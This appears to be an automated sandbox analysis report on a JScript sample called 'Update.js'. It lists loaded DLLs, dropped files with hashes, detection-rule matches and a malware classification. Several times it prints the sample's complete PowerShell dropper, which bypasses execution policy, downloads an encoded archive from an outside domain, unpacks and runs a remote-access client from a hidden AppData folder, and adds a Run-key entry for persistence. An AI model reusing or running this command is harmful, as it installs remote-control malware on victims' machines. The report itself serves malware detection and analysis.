Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_111265B0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_11070430
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_11080740
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_1100892B
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_1101CF30
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_1116EE8B
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_6CA8A980
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL 956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: String function: 11161299 appears 41 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: String function: 11027F40 appears 47 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: String function: 11164ED0 appears 32 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: String function: 11147060 appears 594 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: String function: 1105E820 appears 293 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: String function: 6CA97D00 appears 32 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: String function: 11081E70 appears 46 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: String function: 11029A70 appears 1003 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: String function: 1116FED0 appears 37 times
Source: Update.js | Initial sample: Strings found which are bigger than 50
Source: amsi64_7024.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: sslproxydump.pcap, type: PCAP | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: wscript.exe PID: 7024, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6704, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.rans.troj.expl.evad.winJS@6/28@2/3
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_1105A760 GetLastError,FormatMessageA,LocalFree
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_1109D8F0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_11089430 FindResourceA,LoadResource,LockResource
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6712:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_febnwrhp.qfn.ps1
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe "C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: pcicl32.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: pcichek.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: pcicapi.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: nsmtrace.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: nslsp.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: pcihooks.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: riched32.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: pciinv.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: firewallapi.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: fwbase.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\NSM.ini
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe File opened: C:\Windows\SysWOW64\riched32.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Update.js Static file information: File size 4053374 > 1048576
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dll
                                Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2533582731.000000006CCA1000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2538791982.00000000747F2000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 0000000A.00000002.2489223815.0000000000442000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000A.00000000.1514998417.0000000000442000.00000002.00000001.01000000.00000008.sdmp, client32.exe.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2538169520.0000000073A85000.00000002.00000001.01000000.0000000A.sdmp, pcicapi.dll.8.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr

                                Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Conta
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
